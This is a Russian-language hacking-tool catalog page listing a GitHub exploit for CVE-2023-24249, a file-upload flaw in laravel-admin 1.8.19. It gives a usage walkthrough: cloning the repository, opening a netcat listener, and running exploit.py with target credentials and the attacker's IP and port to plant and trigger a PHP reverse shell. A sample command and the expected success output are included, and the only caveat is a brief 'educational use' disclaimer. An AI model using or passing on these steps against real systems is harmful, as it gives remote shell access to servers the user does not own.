Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-24249-Exploit — Эксплойт для CVE-2023-24249 - уязвимость, позволяющая удаленное выполнение кода через загрузку файлов и внедрение команд. | Kitploit
Инструменты/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubiduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Эксплойт для CVE-2023-24249 - уязвимость, позволяющая удаленное выполнение кода через загрузку файлов и внедрение команд.

Репозиторий
912 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-24249 Эксплойт-скрипт

Описание

Этот репозиторий содержит эксплойт-скрипт для CVE-2023-24249, критической уязвимости, обнаруженной в laravel-admin версии 1.8.19. Данная уязвимость позволяет произвольную загрузку файлов, что даёт злоумышленникам возможность выполнить произвольный код через специально созданный PHP-файл. Эксплойт демонстрирует, как злоумышленник может загрузить reverse shell в целевое приложение и выполнить его для получения удалённого доступа.

Детали уязвимости

CVE-2023-24249 — это уязвимость произвольной загрузки файлов в laravel-admin v1.8.19. Данная уязвимость позволяет злоумышленникам загружать и выполнять произвольные PHP-файлы, что может привести к удалённому выполнению кода.

  • Базовый балл: 7.2 HIGH
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Перечисление слабостей: CWE-434 — Неограниченная загрузка файла опасного типа

Ссылки

  • Эксплойт — сторонняя консультация
  • Репозиторий Laravel Admin на GitHub
  • Официальный сайт Laravel Admin

Эксплойт-скрипт

Предоставленный эксплойт-скрипт автоматизирует процесс эксплуатации CVE-2023-24249. Он выполняет следующие шаги:

  1. Аутентификация: Выполняет вход в целевое приложение с использованием предоставленных учётных данных.
  2. Загрузка Reverse Shell: Загружает PHP-скрипт reverse shell через уязвимую функциональность загрузки файлов.
  3. Выполнение Reverse Shell: Отправляет GET-запрос к загруженному скрипту reverse shell для его выполнения и установления обратного соединения с машиной атакующего.

Требования

  • Python 3
  • библиотека requests
  • библиотека beautifulsoup4

Установите необходимые библиотеки с помощью pip:

root@kitploit:~
pip install requests beautifulsoup4

Использование

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. Запустите слушатель на вашей машине:

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. Запустите эксплойт-скрипт:

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    Замените <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> и <YOUR_PORT> на соответствующие значения:

    • <TARGET_URL>: URL целевого приложения.
    • <USERNAME>: Имя пользователя для аутентификации.
    • <PASSWORD>: Пароль для аутентификации.

Пример

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

Вывод скрипта

Если эксплойт выполнен успешно, скрипт выведет:

root@kitploit:~
[+] Reverse shell успешно загружен! Выполняется попытка его запуска...
[+] Reverse shell успешно выполнен! Проверьте ваш слушатель на <YOUR_IP>:<YOUR_PORT>

Отказ от ответственности

Данный скрипт предназначен только для образовательных целей. Несанкционированное использование этого скрипта против любой системы без явного разрешения является незаконным и неэтичным. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным скриптом.

Скачать инструмент
  • <YOUR_IP>: Ваш IP-адрес для получения соединения reverse shell.
  • <YOUR_PORT>: Порт, на котором работает ваш слушатель.